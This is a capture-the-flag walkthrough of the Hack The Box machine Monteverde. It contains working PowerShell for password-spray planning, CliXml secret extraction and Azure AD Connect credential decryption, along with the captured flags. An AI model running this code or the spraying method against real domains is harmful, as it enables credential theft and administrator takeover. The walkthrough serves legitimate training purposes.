Proof of Concept

10.129.228.111

Nmap

PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman

Information Gathering

Host information gathering

┌──(kali㉿kali)-[~/Monteverde]
└─$ nxc smb 10.129.228.111 --generate-hosts-file hosts
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
 
┌──(kali㉿kali)-[~/Monteverde]
└─$ cat hosts
10.129.228.111     MONTEVERDE.MEGABANK.LOCAL MEGABANK.LOCAL MONTEVERDE

/etc/hosts configuration

┌──(kali㉿kali)-[~/Monteverde]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
 
10.129.228.111     MONTEVERDE.MEGABANK.LOCAL MEGABANK.LOCAL MONTEVERDE

Initial Access

LDAP enumeration: the domain controller accepts an anonymous (null) bind, so the directory can be dumped without credentials

┌──(kali㉿kali)-[~/Monteverde]
└─$ ldapsearch -x -H ldap://10.129.228.111 -D '' -w '' -b "DC=megabank,DC=local" | tee ldapsearch.txt
# extended LDIF
#
# LDAPv3
# base <DC=megabank,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
 
# MEGABANK.LOCAL
dn: DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=MEGABANK,DC=LOCAL
instanceType: 5
whenCreated: 20200102220515.0Z
whenChanged: 20260225155116.0Z
subRefs: DC=ForestDnsZones,DC=MEGABANK,DC=LOCAL
subRefs: DC=DomainDnsZones,DC=MEGABANK,DC=LOCAL
subRefs: CN=Configuration,DC=MEGABANK,DC=LOCAL
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAD3ugOsMvMU+GSt3sotNcxQ==
uSNChanged: 86045
name: MEGABANK
objectGUID:: dF0ZQW9mmEa6eGdQmEH00A==
replUpToDateVector:: AgAAAAAAAAAMAAAAAAAAAA97oDrDLzFPhkrd7KLTXMUFcAAAAAAAAHgMH
 xQDAAAAMCP1QyWOxky/S2wa0HOpshEwAQAAAAAAoMdqGQMAAAAzoIRIq+qDRLLxCfbvMI54CsAAAA
 AAAACx8x8UAwAAAExFNFUyQyFDqQvprs9VhhwM4AAAAAAAABXNIxQDAAAAZVMyWFKpXEGtcEbUU+/
 qWAmwAAAAAAAAB+cfFAMAAABe/et2H9WaTI5xKaaHW43LDgABAAAAAABNzrIWAwAAAJ9Lao0nTq9D
 t7X7so4ZPEcSQAEAAAAAACHMahkDAAAAhz8WkG49/0eslA/vS3oKjgeQAAAAAAAA5BYfFAMAAAAPn
 /fkzuNaRKsJOojPyQTJBoAAAAAAAAA5Ex8UAwAAAKdfSfADqmJLvDeHFzYjcqcL0AAAAAAAALqZIx
 QDAAAAy1EB9fqh3UWLDgubthgcoxNQAQAAAAAAcquvHwMAAABJQsP4aAdBT44BY+zshDghDxABAAA
 AAABjPWgZAwAAAA==
creationTime: 134165082761555509
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
maxPwdAge: -36288000000000
minPwdAge: -864000000000
minPwdLength: 7
<SNIP>

Filter the object names out of the LDAP dump to build userlist.txt. Note that cutting the CN out of each dn yields display names and container names (Users, Computers, Mike Hope) rather than logon names; the sAMAccountName attribute is the reliable source for a spray list.

┌──(kali㉿kali)-[~/Monteverde]
└─$ cat ldapsearch.txt | grep "dn: CN=" | cut -d '=' -f 2 | cut -d ',' -f1 | uniq > userlist.txt

Trying each name as its own password (--no-bruteforce pairs line N of the user list with line N of the password list) authenticates as "SABatchJobs:SABatchJobs". The lockoutThreshold of 0 in the domain object above means failed logons never lock accounts, which is what makes this spray safe; against a real lockout policy, stay below the threshold per observation window.

  • SABatchJobs:SABatchJobs
┌──(kali㉿kali)-[~/Monteverde]
└─$ nxc smb megabank.local -u userlist.txt -p userlist.txt -t 100 --no-bruteforce
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Users:Users STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Computers:Computers STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\System:System STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\LostAndFound:LostAndFound STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Infrastructure:Infrastructure STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\ForeignSecurityPrincipals:ForeignSecurityPrincipals STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Program Data:Program Data STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Microsoft:Microsoft STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\NTDS Quotas:NTDS Quotas STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\DFSR-GlobalSettings:DFSR-GlobalSettings STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Domain System Volume:Domain System Volume STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Content:Content STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\SYSVOL Share:SYSVOL Share STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Topology:Topology STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\MONTEVERDE:MONTEVERDE STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\DFSR-LocalSettings:DFSR-LocalSettings STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Domain System Volume:Domain System Volume STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\SYSVOL Subscription:SYSVOL Subscription STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\SQLServer2005SQLBrowserUser$MONTEVERDE:SQLServer2005SQLBrowserUser$MONTEVERDE STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\ADSyncAdmins:ADSyncAdmins STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\ADSyncOperators:ADSyncOperators STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\ADSyncBrowse:ADSyncBrowse STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\ADSyncPasswordSet:ADSyncPasswordSet STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\BCKUPKEY_PREFERRED Secret:BCKUPKEY_PREFERRED Secret STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Mike Hope:Mike Hope STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Azure Admins:Azure Admins STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
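The two steps above (building the user list and deciding how hard the spray may hit) both come down to reading the ldapsearch dump properly. The following PowerShell is an added example, not code from the original writeup: it parses the LDIF, emits sAMAccountName values for user objects only, and converts the domain password policy out of its 100-nanosecond tick encoding. It assumes the dump was saved as ldapsearch.txt with the tee command above.

```powershell
# Added example, not part of the original writeup: parse the anonymous ldapsearch
# dump (RFC 2849 LDIF) to (1) build a spray list from sAMAccountName instead of the
# CN in each dn, and (2) read the domain password policy so the spray can be sized.
# Assumption: ldapsearch.txt is the file saved with "tee ldapsearch.txt" above.

function ConvertFrom-Ldif {
    param([Parameter(Mandatory)][string[]]$Lines)

    # Unfold continuation lines: a leading space continues the previous attribute value
    $unfolded = New-Object System.Collections.Generic.List[string]
    foreach ($raw in $Lines) {
        if ($raw.StartsWith(' ') -and $unfolded.Count -gt 0) {
            $unfolded[$unfolded.Count - 1] += $raw.Substring(1)
        } else {
            $unfolded.Add($raw)
        }
    }

    # One hashtable per entry: attribute name -> array of values
    $entries = New-Object System.Collections.Generic.List[object]
    $current = $null
    foreach ($line in $unfolded) {
        if ($line.StartsWith('#')) { continue }
        if ($line.Trim().Length -eq 0) {
            if ($current) { $entries.Add($current); $current = $null }
            continue
        }
        $sep = $line.IndexOf(':')
        if ($sep -lt 1) { continue }
        $key   = $line.Substring(0, $sep)
        $value = $line.Substring($sep + 1)
        # "attr:: <base64>" marks a binary value (objectGUID, objectSid, ...); kept base64-encoded
        if ($value.StartsWith(':')) { $value = $value.Substring(1) }
        $value = $value.Trim()
        if (-not $current) { $current = @{} }
        if (-not $current.ContainsKey($key)) { $current[$key] = @() }
        $current[$key] += $value
    }
    if ($current) { $entries.Add($current) }
    return $entries
}

function Get-SprayUserList {
    param([Parameter(Mandatory)][string]$Path)
    # Computer accounts also carry objectClass "user", so exclude them explicitly
    ConvertFrom-Ldif (Get-Content -Path $Path) |
        Where-Object {
            $_['objectClass'] -contains 'user' -and
            $_['objectClass'] -notcontains 'computer' -and
            $_.ContainsKey('sAMAccountName')
        } |
        ForEach-Object { $_['sAMAccountName'][0] } |
        Sort-Object -Unique
}

function Get-DomainPasswordPolicy {
    param([Parameter(Mandatory)][string]$Path)
    $domain = ConvertFrom-Ldif (Get-Content -Path $Path) |
        Where-Object { $_['objectClass'] -contains 'domainDNS' } |
        Select-Object -First 1
    # AD stores these durations as negative counts of 100-nanosecond ticks
    function ToMinutes([string]$ticks) { [math]::Abs([int64]$ticks) / 600000000 }
    [pscustomobject]@{
        LockoutThreshold         = [int]$domain['lockoutThreshold'][0]
        LockoutDurationMinutes   = ToMinutes $domain['lockoutDuration'][0]
        ObservationWindowMinutes = ToMinutes $domain['lockOutObservationWindow'][0]
        MinPwdLength             = [int]$domain['minPwdLength'][0]
        MaxPwdAgeDays            = (ToMinutes $domain['maxPwdAge'][0]) / 1440
    }
}

Get-SprayUserList -Path .\ldapsearch.txt | Set-Content -Path .\userlist.txt
$policy = Get-DomainPasswordPolicy -Path .\ldapsearch.txt
if ($policy.LockoutThreshold -eq 0) {
    'lockoutThreshold=0: failed logons never lock accounts, a full spray is safe'
} else {
    "lockout after $($policy.LockoutThreshold) failures in $($policy.ObservationWindowMinutes) min: at most $($policy.LockoutThreshold - 1) passwords per user per window"
}
```

Run against the domain object shown above, the policy function reports a threshold of 0, a 30 minute lockout duration and observation window, a 7 character minimum and a 42 day maximum password age; the threshold of 0 is the reason the nxc run above could try every account at once without locking anything.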

SABatchJobs has READ access to the non-default azure_uploads and users$ shares

┌──(kali㉿kali)-[~/Monteverde]
└─$ nxc smb megabank.local -u 'SABatchJobs' -p 'SABatchJobs' --shares
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SMB         10.129.228.111  445    MONTEVERDE       [*] Enumerated shares
SMB         10.129.228.111  445    MONTEVERDE       Share           Permissions     Remark
SMB         10.129.228.111  445    MONTEVERDE       -----           -----------     ------
SMB         10.129.228.111  445    MONTEVERDE       ADMIN$                          Remote Admin
SMB         10.129.228.111  445    MONTEVERDE       azure_uploads   READ
SMB         10.129.228.111  445    MONTEVERDE       C$                              Default share
SMB         10.129.228.111  445    MONTEVERDE       E$                              Default share
SMB         10.129.228.111  445    MONTEVERDE       IPC$            READ            Remote IPC
SMB         10.129.228.111  445    MONTEVERDE       NETLOGON        READ            Logon server share
SMB         10.129.228.111  445    MONTEVERDE       SYSVOL          READ            Logon server share
SMB         10.129.228.111  445    MONTEVERDE       users$          READ

azure.xml retrieved from mhope's directory in the users$ share

┌──(kali㉿kali)-[~/Monteverde]
└─$ smbclient //megabank.local/users$/ -U 'SABatchJobs%SABatchJobs'
Try "help" to get a list of possible commands.
smb: \>  ls
  .                                   D        0  Fri Jan  3 08:12:48 2020
  ..                                  D        0  Fri Jan  3 08:12:48 2020
  dgalanos                            D        0  Fri Jan  3 08:12:30 2020
  mhope                               D        0  Fri Jan  3 08:41:18 2020
  roleary                             D        0  Fri Jan  3 08:10:30 2020
  smorgan                             D        0  Fri Jan  3 08:10:24 2020
 
		31999 blocks of size 4096. 28979 blocks available
smb: \> cd mhope
smb: \mhope\> dir
  .                                   D        0  Fri Jan  3 08:41:18 2020
  ..                                  D        0  Fri Jan  3 08:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 08:40:23 2020
 
		31999 blocks of size 4096. 28979 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)

The file is a PowerShell CliXml export (Export-Clixml) of an Azure credential object; its Password property is a plain <S> string, so the secret is stored in the clear

  • 4n0therD4y@n0th3r$
┌──(kali㉿kali)-[~/Monteverde]
└─$ cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
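Whether a CliXml file like this gives up its secret depends on how the property was typed when it was exported: plain strings land in <S> elements readable by anyone with the file, while SecureString and PSCredential secrets land in <SS> elements as DPAPI blobs bound to the exporting user and host. The following is an added example, not code from the original writeup, that triages a CliXml file for both cases; the only assumption is that the file is a CliXml document such as the azure.xml above.

```powershell
# Added example, not from the original writeup: list secret-looking properties in a
# PowerShell CliXml export and report whether each is plain (<S>) or DPAPI-protected (<SS>).
# Assumption: $Path points at a CliXml document written by Export-Clixml, e.g. azure.xml.
function Get-ClixmlSecrets {
    param([Parameter(Mandatory)][string]$Path)

    [xml]$doc = Get-Content -Path $Path -Raw   # Get-Content honours the BOM Export-Clixml writes
    $ns = New-Object System.Xml.XmlNamespaceManager($doc.NameTable)
    $ns.AddNamespace('ps', 'http://schemas.microsoft.com/powershell/2004/04')

    # Named string (<S>) and secure-string (<SS>) properties anywhere in the document
    foreach ($node in $doc.SelectNodes('//ps:S[@N] | //ps:SS[@N]', $ns)) {
        $name = $node.GetAttribute('N')
        if ($name -notmatch 'pass|secret|key|token') { continue }

        if ($node.LocalName -eq 'S') {
            # Plain string property: the secret is stored in the clear
            [pscustomobject]@{ Property = $name; Protection = 'none'; Value = $node.InnerText }
            continue
        }

        # <SS> holds a DPAPI blob; it only unwraps as the exporting user on the exporting host,
        # which is exactly what Import-Clixml attempts here
        $value = $null
        try {
            $obj = Import-Clixml -Path $Path -ErrorAction Stop
            $ss  = $obj.$name
            if ($ss -is [securestring]) {
                $value = (New-Object System.Net.NetworkCredential('', $ss)).Password
            }
        } catch {
            $value = "DPAPI unwrap failed: $($_.Exception.Message)"
        }
        [pscustomobject]@{ Property = $name; Protection = 'DPAPI (user+host)'; Value = $value }
    }
}

Get-ClixmlSecrets -Path .\azure.xml | Format-Table -AutoSize
```

On the azure.xml above this returns a single row, Property Password with Protection none, because the exported object kept its password as an ordinary string; had it been a PSCredential, the <SS> branch would only succeed when run as mhope on MONTEVERDE itself.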

Spraying the recovered password across the user list authenticates as mhope, the owner of the folder the file was found in

  • mhope:4n0therD4y@n0th3r$
┌──(kali㉿kali)-[~/Monteverde]
└─$ nxc smb megabank.local -u userlist.txt -p '4n0therD4y@n0th3r$'
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Administrator:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\krbtgt:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$

WinRM access as mhope over port 5985 (mhope is in Remote Management Users, as the whoami output below shows)

┌──(kali㉿kali)-[~/Monteverde]
└─$ evil-winrm -i megabank.local -u mhope -p '4n0therD4y@n0th3r$'
 
Evil-WinRM shell v3.9
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents>

Read user.txt

*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
3481facd172969fde97cea582d91576b
*Evil-WinRM* PS C:\Users\mhope\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::131
   IPv6 Address. . . . . . . . . . . : dead:beef::5450:6b3c:fdbd:807a
   Link-local IPv6 Address . . . . . : fe80::5450:6b3c:fdbd:807a%7
   IPv4 Address. . . . . . . . . . . : 10.129.228.111
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%7
                                       10.129.0.1

Privilege Escalation

mhope is a member of the "Azure Admins" group. Together with the AAD_987d7f2f57d2 service account and the ADSync* groups seen in the LDAP dump, this indicates the domain controller runs Azure AD Connect.

*Evil-WinRM* PS C:\Users\mhope\Desktop> whoami /all
 
USER INFORMATION
----------------
 
User Name      SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601
 
 
GROUP INFORMATION
-----------------
 
Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448
<SNIP>

Upload a script that extracts and decrypts the AD DS connector credentials from the Azure AD Connect synchronisation configuration. The connector's configuration is stored encrypted in the ADSync SQL database and is unwrapped with the product's own mcrypt.dll, so the script has to run locally on the sync server as a user allowed to read that database.

*Evil-WinRM* PS C:\Users\mhope\Documents> upload decrypt.ps1
 
Info: Uploading /home/kali/Monteverde/decrypt.ps1 to C:\Users\mhope\Documents\decrypt.ps1
 
Data: 6288 bytes of 6288 bytes copied
 
Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Documents> dir
 
 
    Directory: C:\Users\mhope\Documents
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/25/2026   8:49 AM           4718 decrypt.ps1

Running the script recovers the Administrator password: Azure AD Connect was configured with the domain Administrator as its AD DS connector account. Even a least-privileged connector account holds Replicating Directory Changes rights, which is DCSync-equivalent, so this database must be treated as Tier 0.

  • d0m@in4dminyeah!
*Evil-WinRM* PS C:\Users\mhope\Documents> .\decrypt.ps1
Attempting connection: Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync;Integrated Security=True
Error connecting to SQL database. Trying next...
Exception Message: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: SQL Network Interfaces, error: 52 - Unable to locate a Local Database Runtime installation. Verify that SQL Server Express is properly installed and that the Local Database Runtime feature is enabled.)
Attempting connection: Data Source=localhost;Initial Catalog=ADSync;Integrated Security=True
Connection successful!
Loading mcrypt.dll from: C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
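The decrypt.ps1 source is not reproduced on this page. The following PowerShell is an added example that performs the same extraction; it is not the author's script. It assumes the ADSync database is reachable either as LocalDB ((localdb)\.\ADSync) or on the default instance (localhost), matching the two connection attempts in the output above, and that mcrypt.dll sits in the default install path shown there. The KeyManager calls follow the publicly documented extraction technique and should be checked against the installed mcrypt.dll version.

```powershell
# Added example, not the decrypt.ps1 used above: recover the AD DS connector account
# from an Azure AD Connect (ADSync) installation. The connector's clear-text settings
# (domain, user) and its encrypted password blob live in the ADSync database; the key
# set that unwraps the blob is loaded through Microsoft's own mcrypt.dll KeyManager.
# Assumptions: LocalDB or default-instance SQL, default install path for mcrypt.dll,
# and a caller with read access to the ADSync database (here, mhope via Azure Admins).

$connectionStrings = @(
    'Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync;Integrated Security=True',
    'Data Source=localhost;Initial Catalog=ADSync;Integrated Security=True'
)

$client = $null
foreach ($cs in $connectionStrings) {
    try {
        $candidate = New-Object System.Data.SqlClient.SqlConnection($cs)
        $candidate.Open()
        $client = $candidate
        break
    } catch {
        Write-Warning "Could not open '$cs': $($_.Exception.Message)"
    }
}
if (-not $client) { throw 'No ADSync database reachable' }

# Key-set identifiers and entropy for this ADSync instance
$cmd = $client.CreateCommand()
$cmd.CommandText = 'SELECT keyset_id, instance_id, entropy FROM mms_server_configuration'
$reader = $cmd.ExecuteReader()
[void]$reader.Read()
$keysetId   = $reader.GetInt32(0)
$instanceId = $reader.GetGuid(1)
$entropy    = $reader.GetGuid(2)
$reader.Close()

# The on-premises AD connector: XML with domain/user, plus the encrypted password blob
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
[void]$reader.Read()
$configXml = $reader.GetString(0)
$encrypted = $reader.GetString(1)
$reader.Close()
$client.Close()

# Unwrap the blob with the product's own crypto library
$mcrypt = 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
Add-Type -Path $mcrypt
$km = New-Object Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instanceId, $keysetId)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($encrypted, [ref]$decrypted)

$domain   = (Select-Xml -Content $configXml -XPath "//parameter[@name='forest-login-domain']").Node.InnerText
$username = (Select-Xml -Content $configXml -XPath "//parameter[@name='forest-login-user']").Node.InnerText
$password = (Select-Xml -Content $decrypted -XPath '//attribute').Node.InnerText

[pscustomobject]@{ Domain = $domain; Username = $username; Password = $password }
```

Nothing here bypasses a control: every step is an authorised read of the ADSync database followed by a call into the library the product itself uses, which is why membership in the group that owns that database is the only prerequisite. The defensive takeaway is the same either way: treat the sync server and whoever can read its database as Tier 0, and never point the connector at a built-in administrator.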

WinRM access as Administrator

┌──(kali㉿kali)-[~/Monteverde/Azure-AD-Connect-Credential-Extractor]
└─$ evil-winrm -i megabank.local -u 'administrator' -p 'd0m@in4dminyeah!'
 
Evil-WinRM shell v3.9
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Read root.txt

4dee1eeb5cd6108f5601823b3e55788e
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::131
   IPv6 Address. . . . . . . . . . . : dead:beef::5450:6b3c:fdbd:807a
   Link-local IPv6 Address . . . . . : fe80::5450:6b3c:fdbd:807a%7
   IPv4 Address. . . . . . . . . . . : 10.129.228.111
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%7
                                       10.129.0.1